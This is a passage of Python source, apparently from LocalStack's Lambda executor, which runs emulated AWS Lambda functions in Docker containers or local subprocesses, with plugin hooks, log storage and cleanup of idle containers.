from localstack.utils.cloudwatch.cloudwatch_util import cloudwatched, store_cloudwatch_logs
from localstack.utils.common import (
TMP_FILES,
CaptureOutput,
get_all_subclasses,
get_free_tcp_port,
in_docker,
json_safe,
last_index_of,
long_uid,
md5,
now,
run,
save_file,
short_uid,
to_bytes,
to_str,
)
from localstack.utils.docker import DOCKER_CLIENT, ContainerException, PortMappings
from localstack.utils.run import FuncThread
# constants
LAMBDA_EXECUTOR_JAR = INSTALL_PATH_LOCALSTACK_FAT_JAR
LAMBDA_EXECUTOR_CLASS = "cloud.localstack.LambdaExecutor"
LAMBDA_HANDLER_ENV_VAR_NAME = "_HANDLER"
EVENT_FILE_PATTERN = "%s/lambda.event.*.json" % config.TMP_FOLDER
LAMBDA_SERVER_UNIQUE_PORTS = 500
LAMBDA_SERVER_PORT_OFFSET = 5000
LAMBDA_API_UNIQUE_PORTS = 500
LAMBDA_API_PORT_OFFSET = 9000
MAX_ENV_ARGS_LENGTH = 20000
INTERNAL_LOG_PREFIX = "ls-daemon: "
# logger
LOG = logging.getLogger(__name__)
# maximum time a pre-allocated container can sit idle before getting killed
MAX_CONTAINER_IDLE_TIME_MS = 600 * 1000
# SQS event source name
EVENT_SOURCE_SQS = "aws:sqs"
# IP address of main Docker container (lazily initialized)
DOCKER_MAIN_CONTAINER_IP = None
# maps lambda arns to concurrency locks
LAMBDA_CONCURRENCY_LOCK = {}
# CWD folder of handler code in Lambda containers
DOCKER_TASK_FOLDER = "/var/task"
class InvocationException(Exception):
def __init__(self, message, log_output, result=None):
super(InvocationException, self).__init__(message)
self.log_output = log_output
self.result = result
class AdditionalInvocationOptions:
# Maps file keys to file paths. The keys can be used as placeholders in the env. variables
# and command args to reference files - e.g., given `files_to_add` as {"f1": "/local/path"} and
# `env_updates` as {"MYENV": "{f1}"}, the Lambda handler will receive an environment variable
# `MYENV=/lambda/path` and the file /lambda/path will be accessible to the Lambda handler
# (either locally, or inside Docker).
files_to_add: Dict[str, str]
# Environment variable updates to apply for the invocation
env_updates: Dict[str, str]
# Updated command to use for starting the Lambda process (or None)
updated_command: Optional[str]
def __init__(self, files_to_add=None, env_updates=None, updated_command=None):
self.files_to_add = files_to_add or {}
self.env_updates = env_updates or {}
self.updated_command = updated_command
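# Hedged illustration of the placeholder mechanism documented above; the file
# path and environment variable are made up, and this helper is never called.
def _example_additional_invocation_options():
    return AdditionalInvocationOptions(
        files_to_add={"f1": "/local/cert.pem"},
        # "{f1}" is later rewritten to the path the file receives inside the
        # Lambda environment (see apply_plugin_patches below)
        env_updates={"SSL_CERT_FILE": "{f1}"},
    )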
class InvocationResult:
def __init__(self, result, log_output=""):
if isinstance(result, InvocationResult):
raise Exception("Unexpected invocation result type: %s" % result)
self.result = result
self.log_output = log_output or ""
class InvocationContext:
lambda_function: LambdaFunction
event: Dict[str, Any]
lambda_command: str # TODO: change to List[str] ?
docker_flags: str # TODO: change to List[str] ?
environment: Dict[str, str]
context: Dict[str, Any]
def __init__(
self,
lambda_function: LambdaFunction,
event: Dict,
environment=None,
context=None,
lambda_command=None,
docker_flags=None,
):
self.lambda_function = lambda_function
self.event = event
self.environment = {} if environment is None else environment
self.context = {} if context is None else context
self.lambda_command = lambda_command
self.docker_flags = docker_flags
class LambdaExecutorPlugin:
"""Plugin abstraction that allows to hook in additional functionality into the Lambda executors."""
INSTANCES: List["LambdaExecutorPlugin"] = []
def initialize(self):
"""Called once, for any active plugin to run initialization logic (e.g., downloading dependencies).
Uses lazy initialization - i.e., runs only after the first should_apply() call returns True"""
pass
def should_apply(self, context: InvocationContext) -> bool:
"""Whether the plugin logic should get applied for the given Lambda invocation context."""
return False
def prepare_invocation(
self, context: InvocationContext
) -> Optional[AdditionalInvocationOptions]:
"""Return additional invocation options for given Lambda invocation context."""
return None
def process_result(
self, context: InvocationContext, result: InvocationResult
) -> InvocationResult:
"""Optionally modify the result returned from the given Lambda invocation."""
return result
def init_function_configuration(self, lambda_function: LambdaFunction):
"""Initialize the configuration of the given function upon creation or function update."""
pass
def init_function_code(self, lambda_function: LambdaFunction):
"""Initialize the code of the given function upon creation or function update."""
pass
@classmethod
def get_plugins(cls) -> List["LambdaExecutorPlugin"]:
if not cls.INSTANCES:
classes = get_all_subclasses(LambdaExecutorPlugin)
cls.INSTANCES = [clazz() for clazz in classes]
return cls.INSTANCES
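# Hedged sketch of a custom plugin. A subclass defined at module level would be
# picked up automatically by get_plugins() via get_all_subclasses(), so the
# example class is only created inside this never-called helper. All names are
# illustrative.
def _example_plugin_class():
    class AddMarkerEnvPlugin(LambdaExecutorPlugin):
        def should_apply(self, context: InvocationContext) -> bool:
            return True

        def prepare_invocation(self, context: InvocationContext):
            # inject an extra environment variable into every invocation
            return AdditionalInvocationOptions(env_updates={"MY_MARKER": "1"})

    return AddMarkerEnvPlugin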
def get_from_event(event, key):
try:
return event["Records"][0][key]
except KeyError:
return None
def is_java_lambda(lambda_details):
runtime = getattr(lambda_details, "runtime", lambda_details)
return runtime in [LAMBDA_RUNTIME_JAVA8, LAMBDA_RUNTIME_JAVA8_AL2, LAMBDA_RUNTIME_JAVA11]
def is_nodejs_runtime(lambda_details):
runtime = getattr(lambda_details, "runtime", lambda_details) or ""
return runtime.startswith("nodejs")
def _store_logs(func_details, log_output, invocation_time=None, container_id=None):
log_group_name = "/aws/lambda/%s" % func_details.name()
container_id = container_id or short_uid()
invocation_time = invocation_time or int(time.time() * 1000)
invocation_time_secs = int(invocation_time / 1000)
time_str = time.strftime("%Y/%m/%d", time.gmtime(invocation_time_secs))
log_stream_name = "%s/[LATEST]%s" % (time_str, container_id)
return store_cloudwatch_logs(log_group_name, log_stream_name, log_output, invocation_time)
def get_main_endpoint_from_container():
global DOCKER_MAIN_CONTAINER_IP
if not config.HOSTNAME_FROM_LAMBDA and DOCKER_MAIN_CONTAINER_IP is None:
DOCKER_MAIN_CONTAINER_IP = False
try:
if in_docker():
DOCKER_MAIN_CONTAINER_IP = bootstrap.get_main_container_ip()
LOG.info("Determined main container target IP: %s" % DOCKER_MAIN_CONTAINER_IP)
except Exception as e:
container_name = bootstrap.get_main_container_name()
LOG.info(
'Unable to get IP address of main Docker container "%s": %s' % (container_name, e)
)
# return (1) predefined endpoint host, or (2) main container IP, or (3) Docker host (e.g., bridge IP)
return (
config.HOSTNAME_FROM_LAMBDA or DOCKER_MAIN_CONTAINER_IP or config.DOCKER_HOST_FROM_CONTAINER
)
def rm_docker_container(container_name_or_id, check_existence=False, safe=False):
# TODO: remove method / move to docker module
if not container_name_or_id:
return
if check_existence and container_name_or_id not in DOCKER_CLIENT.get_running_container_names():
# TODO: check names as well as container IDs!
return
try:
DOCKER_CLIENT.remove_container(container_name_or_id)
except Exception:
if not safe:
raise
class LambdaAsyncLocks:
locks: Dict[str, Union[threading.Semaphore, threading.Lock]]
creation_lock: threading.Lock
def __init__(self):
self.locks = {}
self.creation_lock = threading.Lock()
def assure_lock_present(
self, key: str, lock: Union[threading.Semaphore, threading.Lock]
) -> Union[threading.Semaphore, threading.Lock]:
with self.creation_lock:
return self.locks.setdefault(key, lock)
LAMBDA_ASYNC_LOCKS = LambdaAsyncLocks()
class LambdaExecutor(object):
"""Base class for Lambda executors. Subclasses must overwrite the _execute method"""
def __init__(self):
# keeps track of each function arn and the last time it was invoked
self.function_invoke_times = {}
def _prepare_environment(self, func_details):
# setup environment pre-defined variables for docker environment
result = func_details.envvars.copy()
# injecting aws credentials into docker environment if not provided
aws_stack.inject_test_credentials_into_env(result)
# injecting the region into the docker environment
aws_stack.inject_region_into_env(result, func_details.region())
return result
def execute(
self,
func_arn,
func_details,
event,
context=None,
version=None,
asynchronous=False,
callback=None,
lock_discriminator: str = None,
):
def do_execute(*args):
@cloudwatched("lambda")
def _run(func_arn=None):
with contextlib.ExitStack() as stack:
if lock_discriminator:
stack.enter_context(LAMBDA_ASYNC_LOCKS.locks[lock_discriminator])
# set the invocation time in milliseconds
invocation_time = int(time.time() * 1000)
# start the execution
raised_error = None
result = None
dlq_sent = None
try:
result = self._execute(func_arn, func_details, event, context, version)
except Exception as e:
raised_error = e
if asynchronous:
if get_from_event(event, "eventSource") == EVENT_SOURCE_SQS:
sqs_queue_arn = get_from_event(event, "eventSourceARN")
if sqs_queue_arn:
# event source is SQS, send event back to dead letter queue
dlq_sent = sqs_error_to_dead_letter_queue(
sqs_queue_arn, event, e
)
else:
# event source is not SQS, send back to lambda dead letter queue
lambda_error_to_dead_letter_queue(func_details, event, e)
raise e
finally:
self.function_invoke_times[func_arn] = invocation_time
callback and callback(
result, func_arn, event, error=raised_error, dlq_sent=dlq_sent
)
lambda_result_to_destination(
func_details, event, result, asynchronous, raised_error
)
# return final result
return result
return _run(func_arn=func_arn)
# Inform users about asynchronous mode of the lambda execution.
if asynchronous:
LOG.debug(
"Lambda executed in Event (asynchronous) mode, no response will be returned to caller"
)
FuncThread(do_execute).start()
return InvocationResult(None, log_output="Lambda executed asynchronously.")
return do_execute()
def _execute(self, func_arn, func_details, event, context=None, version=None):
"""This method must be overwritten by subclasses."""
raise NotImplementedError
def startup(self):
"""Called once during startup - can be used, e.g., to prepare Lambda Docker environment"""
pass
def cleanup(self, arn=None):
"""Called once during startup - can be used, e.g., to clean up left-over Docker containers"""
pass
def provide_file_to_lambda(self, local_file: str, inv_context: InvocationContext) -> str:
"""Make the given file available to the Lambda process (e.g., by copying into the container) for the
given invocation context; Returns the path to the file that will be available to the Lambda handler."""
raise NotImplementedError
def apply_plugin_patches(self, inv_context: InvocationContext):
"""Loop through the list of plugins, and apply their patches to the invocation context (if applicable)"""
for plugin in LambdaExecutorPlugin.get_plugins():
if not plugin.should_apply(inv_context):
continue
# initialize, if not done yet
if not hasattr(plugin, "_initialized"):
LOG.debug("Initializing Lambda executor plugin %s", plugin.__class__)
plugin.initialize()
plugin._initialized = True
# invoke plugin to prepare invocation
inv_options = plugin.prepare_invocation(inv_context)
if not inv_options:
continue
# copy files
file_keys_map = {}
for key, file_path in inv_options.files_to_add.items():
file_in_container = self.provide_file_to_lambda(file_path, inv_context)
file_keys_map[key] = file_in_container
# replace placeholders like "{<fileKey>}" with corresponding file path
for key, file_path in file_keys_map.items():
for env_key, env_value in inv_options.env_updates.items():
inv_options.env_updates[env_key] = str(env_value).replace(
"{%s}" % key, file_path
)
if inv_options.updated_command:
inv_options.updated_command = inv_options.updated_command.replace(
"{%s}" % key, file_path
)
inv_context.lambda_command = inv_options.updated_command
# update environment
inv_context.environment.update(inv_options.env_updates)
def process_result_via_plugins(
self, inv_context: InvocationContext, invocation_result: InvocationResult
) -> InvocationResult:
"""Loop through the list of plugins, and apply their post-processing logic to the Lambda invocation result."""
for plugin in LambdaExecutorPlugin.get_plugins():
if not plugin.should_apply(inv_context):
continue
invocation_result = plugin.process_result(inv_context, invocation_result)
return invocation_result
class ContainerInfo:
"""Contains basic information about a docker container."""
def __init__(self, name, entry_point):
self.name = name
self.entry_point = entry_point
class LambdaExecutorContainers(LambdaExecutor):
"""Abstract executor class for executing Lambda functions in Docker containers"""
def execute_in_container(
self, func_details, env_vars, command, docker_flags=None, stdin=None, background=False
) -> Tuple[bytes, bytes]:
raise NotImplementedError
def run_lambda_executor(self, event=None, func_details=None, env_vars=None, command=None):
env_vars = dict(env_vars or {})
runtime = func_details.runtime or ""
stdin_str = None
event_body = event if event is not None else env_vars.get("AWS_LAMBDA_EVENT_BODY")
event_body = json.dumps(event_body) if isinstance(event_body, dict) else event_body
event_body = event_body or ""
is_large_event = len(event_body) > MAX_ENV_ARGS_LENGTH
is_provided = runtime.startswith(LAMBDA_RUNTIME_PROVIDED)
if (
not is_large_event
and func_details
and is_provided
and env_vars.get("DOCKER_LAMBDA_USE_STDIN") == "1"
):
# Note: certain "provided" runtimes (e.g., Rust programs) can block if we pass in
# the event payload via stdin, hence we rewrite the command to "echo ... | ..." below
env_updates = {
"AWS_LAMBDA_EVENT_BODY": to_str(
event_body
), # Note: seems to be needed for provided runtimes!
"DOCKER_LAMBDA_USE_STDIN": "1",
}
env_vars.update(env_updates)
# Note: $AWS_LAMBDA_COGNITO_IDENTITY='{}' causes Rust Lambdas to hang
env_vars.pop("AWS_LAMBDA_COGNITO_IDENTITY", None)
if is_large_event:
# in case of very large event payloads, we need to pass them via stdin
LOG.debug(
"Received large Lambda event payload (length %s) - passing via stdin"
% len(event_body)
)
env_vars["DOCKER_LAMBDA_USE_STDIN"] = "1"
if env_vars.get("DOCKER_LAMBDA_USE_STDIN") == "1":
stdin_str = event_body
if not is_provided:
env_vars.pop("AWS_LAMBDA_EVENT_BODY", None)
elif "AWS_LAMBDA_EVENT_BODY" not in env_vars:
env_vars["AWS_LAMBDA_EVENT_BODY"] = to_str(event_body)
# apply plugin patches
inv_context = InvocationContext(func_details, event, environment=env_vars)
self.apply_plugin_patches(inv_context)
docker_flags = config.LAMBDA_DOCKER_FLAGS or ""
if inv_context.docker_flags:
docker_flags = f"{docker_flags} {inv_context.docker_flags}"
event_stdin_bytes = stdin_str and to_bytes(stdin_str)
error = None
try:
result, log_output = self.execute_in_container(
func_details, env_vars, command, docker_flags=docker_flags, stdin=event_stdin_bytes
)
except ContainerException as e:
result = e.stdout or ""
log_output = e.stderr or ""
error = e
try:
result = to_str(result).strip()
except Exception:
pass
log_output = to_str(log_output).strip()
# Note: The user's code may have been logging to stderr, in which case the logs
# will be part of the "result" variable here. Hence, make sure that we extract
# only the *last* line of "result" and consider anything above that as log output.
if isinstance(result, str) and "\n" in result:
lines = result.split("\n")
idx = last_index_of(
lines, lambda line: line and not line.startswith(INTERNAL_LOG_PREFIX)
)
if idx >= 0:
result = lines[idx]
additional_logs = "\n".join(lines[:idx] + lines[idx + 1 :])
log_output += "\n%s" % additional_logs
log_formatted = log_output.strip().replace("\n", "\n> ")
func_arn = func_details and func_details.arn()
LOG.debug(
"Lambda %s result / log output:\n%s\n> %s" % (func_arn, result.strip(), log_formatted)
)
# store log output - TODO get live logs from `process` above?
_store_logs(func_details, log_output)
if error:
raise InvocationException(
"Lambda process returned with error. Result: %s. Output:\n%s"
% (result, log_output),
log_output,
result,
) from error
# create result
invocation_result = InvocationResult(result, log_output=log_output)
# run plugins post-processing logic
invocation_result = self.process_result_via_plugins(inv_context, invocation_result)
return invocation_result
def prepare_event(self, environment: Dict, event_body: str) -> bytes:
"""Return the event as a stdin string."""
# amend the environment variables for execution
environment["AWS_LAMBDA_EVENT_BODY"] = event_body
return event_body.encode()
def _execute(
self, func_arn: str, func_details: LambdaFunction, event: Dict, context=None, version=None
):
runtime = func_details.runtime
handler = func_details.handler
environment = self._prepare_environment(func_details)
# configure USE_SSL in environment
if config.USE_SSL:
environment["USE_SSL"] = "1"
# prepare event body
if not event:
LOG.info('Empty event body specified for invocation of Lambda "%s"' % func_arn)
event = {}
event_body = json.dumps(json_safe(event))
event_bytes_for_stdin = self.prepare_event(environment, event_body)
Util.inject_endpoints_into_env(environment)
environment["EDGE_PORT"] = str(config.EDGE_PORT)
environment[LAMBDA_HANDLER_ENV_VAR_NAME] = handler
if os.environ.get("HTTP_PROXY"):
environment["HTTP_PROXY"] = os.environ["HTTP_PROXY"]
if func_details.timeout:
environment["AWS_LAMBDA_FUNCTION_TIMEOUT"] = str(func_details.timeout)
if context:
environment["AWS_LAMBDA_FUNCTION_NAME"] = context.function_name
environment["AWS_LAMBDA_FUNCTION_VERSION"] = context.function_version
environment["AWS_LAMBDA_FUNCTION_INVOKED_ARN"] = context.invoked_function_arn
environment["AWS_LAMBDA_COGNITO_IDENTITY"] = json.dumps(context.cognito_identity or {})
if context.client_context is not None:
environment["AWS_LAMBDA_CLIENT_CONTEXT"] = json.dumps(
to_str(base64.b64decode(to_bytes(context.client_context)))
)
# pass JVM options to the Lambda environment, if configured
if config.LAMBDA_JAVA_OPTS and is_java_lambda(runtime):
if environment.get("JAVA_TOOL_OPTIONS"):
LOG.info(
"Skip setting LAMBDA_JAVA_OPTS as JAVA_TOOL_OPTIONS already defined in Lambda env vars"
)
else:
LOG.debug(
"Passing JVM options to container environment: JAVA_TOOL_OPTIONS=%s"
% config.LAMBDA_JAVA_OPTS
)
environment["JAVA_TOOL_OPTIONS"] = config.LAMBDA_JAVA_OPTS
# accept any self-signed certificates for outgoing calls from the Lambda
if is_nodejs_runtime(runtime):
environment["NODE_TLS_REJECT_UNAUTHORIZED"] = "0"
# run Lambda executor and fetch invocation result
LOG.info("Running lambda: %s" % func_details.arn())
result = self.run_lambda_executor(
event=event_bytes_for_stdin, env_vars=environment, func_details=func_details
)
return result
def provide_file_to_lambda(self, local_file: str, inv_context: InvocationContext) -> str:
if config.LAMBDA_REMOTE_DOCKER:
LOG.info("TODO: copy file into container for LAMBDA_REMOTE_DOCKER=1 - %s", local_file)
return local_file
mountable_file = Util.get_host_path_for_path_in_docker(local_file)
_, extension = os.path.splitext(local_file)
target_file_name = f"{md5(local_file)}{extension}"
target_path = f"/tmp/{target_file_name}"
inv_context.docker_flags = inv_context.docker_flags or ""
inv_context.docker_flags += f"-v {mountable_file}:{target_path}"
return target_path
class LambdaExecutorReuseContainers(LambdaExecutorContainers):
"""Executor class for executing Lambda functions in re-usable Docker containers"""
def __init__(self):
super(LambdaExecutorReuseContainers, self).__init__()
# locking thread for creation/destruction of docker containers.
self.docker_container_lock = threading.RLock()
# On each invocation we try to construct a port unlikely to conflict
# with a previously invoked lambda function. This is a problem with at
# least the lambci/lambda:go1.x container, which execs a go program that
# attempts to bind to the same default port.
self.next_port = 0
self.max_port = LAMBDA_SERVER_UNIQUE_PORTS
self.port_offset = LAMBDA_SERVER_PORT_OFFSET
def execute_in_container(
self, func_details, env_vars, command, docker_flags=None, stdin=None, background=False
) -> Tuple[bytes, bytes]:
func_arn = func_details.arn()
lambda_cwd = func_details.cwd
runtime = func_details.runtime
handler = func_details.handler
# check whether the Lambda has been invoked before
has_been_invoked_before = func_arn in self.function_invoke_times
# Choose a port for this invocation
with self.docker_container_lock:
env_vars["_LAMBDA_SERVER_PORT"] = str(self.next_port + self.port_offset)
self.next_port = (self.next_port + 1) % self.max_port
# create/verify the docker container is running.
LOG.debug(
'Priming docker container with runtime "%s" and arn "%s".',
runtime,
func_arn,
)
container_info = self.prime_docker_container(
func_details, dict(env_vars), lambda_cwd, docker_flags
)
if not command and handler:
command = container_info.entry_point.split()
command.append(handler)
# determine files to be copied into the container
if not has_been_invoked_before and config.LAMBDA_REMOTE_DOCKER:
# if this is the first invocation: copy the entire folder into the container
DOCKER_CLIENT.copy_into_container(
container_info.name, f"{lambda_cwd}/.", DOCKER_TASK_FOLDER
)
return DOCKER_CLIENT.exec_in_container(
container_name_or_id=container_info.name,
command=command,
interactive=True,
env_vars=env_vars,
stdin=stdin,
)
def _execute(self, func_arn, *args, **kwargs):
if not LAMBDA_CONCURRENCY_LOCK.get(func_arn):
concurrency_lock = threading.RLock()
LAMBDA_CONCURRENCY_LOCK[func_arn] = concurrency_lock
with LAMBDA_CONCURRENCY_LOCK[func_arn]:
return super(LambdaExecutorReuseContainers, self)._execute(func_arn, *args, **kwargs)
def startup(self):
self.cleanup()
# start a process to remove idle containers
if config.LAMBDA_REMOVE_CONTAINERS:
self.start_idle_container_destroyer_interval()
def cleanup(self, arn=None):
if arn:
self.function_invoke_times.pop(arn, None)
return self.destroy_docker_container(arn)
self.function_invoke_times = {}
return self.destroy_existing_docker_containers()
def prime_docker_container(self, func_details, env_vars, lambda_cwd, docker_flags=None):
"""
Prepares a persistent docker container for a specific function.
:param func_details: The Details of the lambda function.
:param env_vars: The environment variables for the lambda.
:param lambda_cwd: The local directory containing the code for the lambda function.
:return: ContainerInfo class containing the container name and default entry point.
"""
with self.docker_container_lock:
# Get the container name and id.
func_arn = func_details.arn()
container_name = self.get_container_name(func_arn)
status = self.get_docker_container_status(func_arn)
LOG.debug('Priming Docker container (status "%s"): %s' % (status, container_name))
docker_image = Util.docker_image_for_lambda(func_details)
# Container is not running or doesn't exist.
if status < 1:
# Make sure the container does not exist in any form/state.
self.destroy_docker_container(func_arn)
# get container startup command and run it
LOG.debug("Creating container: %s" % container_name)
self.create_container(func_details, env_vars, lambda_cwd, docker_flags)
if config.LAMBDA_REMOTE_DOCKER:
LOG.debug(
'Copying files to container "%s" from "%s".' % (container_name, lambda_cwd)
)
DOCKER_CLIENT.copy_into_container(
container_name, "%s/." % lambda_cwd, DOCKER_TASK_FOLDER
)
LOG.debug("Starting docker-reuse Lambda container: %s", container_name)
DOCKER_CLIENT.start_container(container_name)
# give the container some time to start up
time.sleep(1)
container_network = self.get_docker_container_network(func_arn)
entry_point = DOCKER_CLIENT.get_image_entrypoint(docker_image)
LOG.debug(
'Using entrypoint "%s" for container "%s" on network "%s".'
% (entry_point, container_name, container_network)
)
return ContainerInfo(container_name, entry_point)
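    # Rough lifecycle of the docker-reuse executor (a descriptive sketch of the code in this class):
    # prime_docker_container() makes sure a long-lived container exists and is running,
    # execute_in_container() copies the code into it (when LAMBDA_REMOTE_DOCKER is set) and
    # runs the handler via "docker exec", and idle_container_destroyer() removes the container
    # once it has been idle for longer than MAX_CONTAINER_IDLE_TIME_MS.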
def create_container(self, func_details, env_vars, lambda_cwd, docker_flags=None):
docker_image = Util.docker_image_for_lambda(func_details)
container_name = self.get_container_name(func_details.arn())
# make sure we set LOCALSTACK_HOSTNAME
Util.inject_endpoints_into_env(env_vars)
# make sure AWS_LAMBDA_EVENT_BODY is not set (otherwise causes issues with "docker exec ..." above)
env_vars.pop("AWS_LAMBDA_EVENT_BODY", None)
network = config.LAMBDA_DOCKER_NETWORK
additional_flags = docker_flags
dns = config.LAMBDA_DOCKER_DNS
mount_volumes = not config.LAMBDA_REMOTE_DOCKER
lambda_cwd_on_host = Util.get_host_path_for_path_in_docker(lambda_cwd)
if ":" in lambda_cwd and "\\" in lambda_cwd:
lambda_cwd_on_host = Util.format_windows_path(lambda_cwd_on_host)
mount_volumes = [(lambda_cwd_on_host, DOCKER_TASK_FOLDER)] if mount_volumes else None
if os.environ.get("HOSTNAME"):
env_vars["HOSTNAME"] = os.environ.get("HOSTNAME")
env_vars["EDGE_PORT"] = config.EDGE_PORT
LOG.debug(
"Creating docker-reuse Lambda container %s from image %s", container_name, docker_image
)
return DOCKER_CLIENT.create_container(
image_name=docker_image,
remove=True,
interactive=True,
name=container_name,
entrypoint="/bin/bash",
network=network,
env_vars=env_vars,
dns=dns,
mount_volumes=mount_volumes,
additional_flags=additional_flags,
)
def destroy_docker_container(self, func_arn):
"""
Stops and/or removes a docker container for a specific lambda function ARN.
:param func_arn: The ARN of the lambda function.
:return: None
"""
with self.docker_container_lock:
status = self.get_docker_container_status(func_arn)
# Get the container name and id.
container_name = self.get_container_name(func_arn)
if status == 1:
LOG.debug("Stopping container: %s" % container_name)
DOCKER_CLIENT.stop_container(container_name)
status = self.get_docker_container_status(func_arn)
if status == -1:
LOG.debug("Removing container: %s" % container_name)
rm_docker_container(container_name, safe=True)
# clean up function invoke times, as some init logic depends on this
self.function_invoke_times.pop(func_arn, None)
def get_all_container_names(self):
"""
Returns a list of container names for lambda containers.
        :return: A list of LocalStack docker container names, one per lambda function.
"""
with self.docker_container_lock:
LOG.debug("Getting all lambda containers names.")
list_result = DOCKER_CLIENT.list_containers(filter="name=localstack_lambda_*")
container_names = list(map(lambda container: container["name"], list_result))
return container_names
def destroy_existing_docker_containers(self):
"""
Stops and/or removes all lambda docker containers for localstack.
:return: None
"""
with self.docker_container_lock:
container_names = self.get_all_container_names()
LOG.debug("Removing %d containers." % len(container_names))
for container_name in container_names:
DOCKER_CLIENT.remove_container(container_name)
def get_docker_container_status(self, func_arn):
"""
Determine the status of a docker container.
:param func_arn: The ARN of the lambda function.
        :return: 1 if the container is running,
                 -1 if the container exists but is not running,
                 0 if the container does not exist.
"""
with self.docker_container_lock:
# Get the container name and id.
container_name = self.get_container_name(func_arn)
container_status = DOCKER_CLIENT.get_container_status(container_name)
return container_status.value
def get_docker_container_network(self, func_arn):
"""
Determine the network of a docker container.
:param func_arn: The ARN of the lambda function.
:return: name of the container network
"""
with self.docker_container_lock:
status = self.get_docker_container_status(func_arn)
# container does not exist
if status == 0:
return ""
# Get the container name.
container_name = self.get_container_name(func_arn)
container_network = DOCKER_CLIENT.get_network(container_name)
return container_network
def idle_container_destroyer(self):
"""
        Iterates through all the lambda containers and destroys any container that has
been inactive for longer than MAX_CONTAINER_IDLE_TIME_MS.
:return: None
"""
LOG.debug("Checking if there are idle containers ...")
current_time = int(time.time() * 1000)
for func_arn, last_run_time in dict(self.function_invoke_times).items():
duration = current_time - last_run_time
# not enough idle time has passed
if duration < MAX_CONTAINER_IDLE_TIME_MS:
continue
# container has been idle, destroy it.
self.destroy_docker_container(func_arn)
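    # Illustrative timing (threshold value hypothetical): if MAX_CONTAINER_IDLE_TIME_MS were
    # 600000 (10 minutes) and a function was last invoked at t=0, a destroyer run at t=9min
    # keeps the container (duration < threshold), while a run at t=11min destroys it.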
def start_idle_container_destroyer_interval(self):
"""
        Runs the idle container destroyer once and then re-schedules itself every 60 seconds,
        thereby periodically checking for idle containers and destroying them.
:return: None
"""
self.idle_container_destroyer()
threading.Timer(60.0, self.start_idle_container_destroyer_interval).start()
def get_container_name(self, func_arn):
"""
Given a function ARN, returns a valid docker container name.
:param func_arn: The ARN of the lambda function.
:return: A docker compatible name for the arn.
"""
return "localstack_lambda_" + re.sub(r"[^a-zA-Z0-9_.-]", "_", func_arn)
class LambdaExecutorSeparateContainers(LambdaExecutorContainers):
def __init__(self):
super(LambdaExecutorSeparateContainers, self).__init__()
self.max_port = LAMBDA_API_UNIQUE_PORTS
self.port_offset = LAMBDA_API_PORT_OFFSET
def prepare_event(self, environment: Dict, event_body: str) -> bytes:
# Tell Lambci to use STDIN for the event
environment["DOCKER_LAMBDA_USE_STDIN"] = "1"
return event_body.encode()
def execute_in_container(
self, func_details, env_vars, command, docker_flags=None, stdin=None, background=False
) -> Tuple[bytes, bytes]:
lambda_cwd = func_details.cwd
handler = func_details.handler
entrypoint = None
if command:
entrypoint = ""
elif handler:
command = handler
else:
command = None
# add Docker Lambda env vars
network = config.LAMBDA_DOCKER_NETWORK or None
if network == "host":
port = get_free_tcp_port()
env_vars["DOCKER_LAMBDA_API_PORT"] = port
env_vars["DOCKER_LAMBDA_RUNTIME_PORT"] = port
additional_flags = docker_flags or ""
dns = config.LAMBDA_DOCKER_DNS
docker_java_ports = PortMappings()
if Util.debug_java_port:
docker_java_ports.add(Util.debug_java_port)
docker_image = Util.docker_image_for_lambda(func_details)
if config.LAMBDA_REMOTE_DOCKER:
container_id = DOCKER_CLIENT.create_container(
image_name=docker_image,
interactive=True,
entrypoint=entrypoint,
remove=True,
network=network,
env_vars=env_vars,
dns=dns,
additional_flags=additional_flags,
ports=docker_java_ports,
command=command,
)
DOCKER_CLIENT.copy_into_container(container_id, f"{lambda_cwd}/.", DOCKER_TASK_FOLDER)
return DOCKER_CLIENT.start_container(
container_id, interactive=not background, attach=not background, stdin=stdin
)
else:
mount_volumes = None
if lambda_cwd:
mount_volumes = [
(Util.get_host_path_for_path_in_docker(lambda_cwd), DOCKER_TASK_FOLDER)
]
return DOCKER_CLIENT.run_container(
image_name=docker_image,
interactive=True,
detach=background,
entrypoint=entrypoint,
remove=True,
network=network,
env_vars=env_vars,
dns=dns,
additional_flags=additional_flags,
command=command,
mount_volumes=mount_volumes,
stdin=stdin,
)
class LambdaExecutorLocal(LambdaExecutor):
def _execute_in_custom_runtime(self, cmd: str, func_details=None) -> InvocationResult:
"""
Generic run function for executing lambdas in custom runtimes.
:param cmd: the command to execute
:param func_details: function details
:return: the InvocationResult
"""
env_vars = func_details and func_details.envvars
kwargs = {"stdin": True, "inherit_env": True, "asynchronous": True, "env_vars": env_vars}
process = run(cmd, stderr=subprocess.PIPE, outfile=subprocess.PIPE, **kwargs)
result, log_output = process.communicate()
try:
result = to_str(result).strip()
except Exception:
pass
log_output = to_str(log_output).strip()
return_code = process.returncode
# Note: The user's code may have been logging to stderr, in which case the logs
# will be part of the "result" variable here. Hence, make sure that we extract
# only the *last* line of "result" and consider anything above that as log output.
# TODO: not sure if this code is needed/used
if isinstance(result, str) and "\n" in result:
lines = result.split("\n")
idx = last_index_of(
lines, lambda line: line and not line.startswith(INTERNAL_LOG_PREFIX)
)
if idx >= 0:
result = lines[idx]
additional_logs = "\n".join(lines[:idx] + lines[idx + 1 :])
log_output += "\n%s" % additional_logs
log_formatted = log_output.strip().replace("\n", "\n> ")
func_arn = func_details and func_details.arn()
LOG.debug(
"Lambda %s result / log output:\n%s\n> %s" % (func_arn, result.strip(), log_formatted)
)
# store log output - TODO get live logs from `process` above?
_store_logs(func_details, log_output)
if return_code != 0:
raise InvocationException(
"Lambda process returned error status code: %s. Result: %s. Output:\n%s"
% (return_code, result, log_output),
log_output,
result,
)
invocation_result = InvocationResult(result, log_output=log_output)
return invocation_result
def _execute(
self, func_arn, func_details, event, context=None, version=None
) -> InvocationResult:
lambda_cwd = func_details.cwd
environment = self._prepare_environment(func_details)
if func_details.timeout:
environment["AWS_LAMBDA_FUNCTION_TIMEOUT"] = str(func_details.timeout)
if context:
environment["AWS_LAMBDA_FUNCTION_NAME"] = context.function_name
environment["AWS_LAMBDA_FUNCTION_VERSION"] = context.function_version
environment["AWS_LAMBDA_FUNCTION_INVOKED_ARN"] = context.invoked_function_arn
environment["AWS_LAMBDA_FUNCTION_MEMORY_SIZE"] = str(context.memory_limit_in_mb)
# execute the Lambda function in a forked sub-process, sync result via queue
queue = Queue()
lambda_function = func_details.function(version)
def do_execute():
# now we're executing in the child process, safe to change CWD and ENV
result = None
try:
if lambda_cwd:
os.chdir(lambda_cwd)
sys.path.insert(0, "")
if environment:
os.environ.update(environment)
# set default env variables required for most Lambda handlers
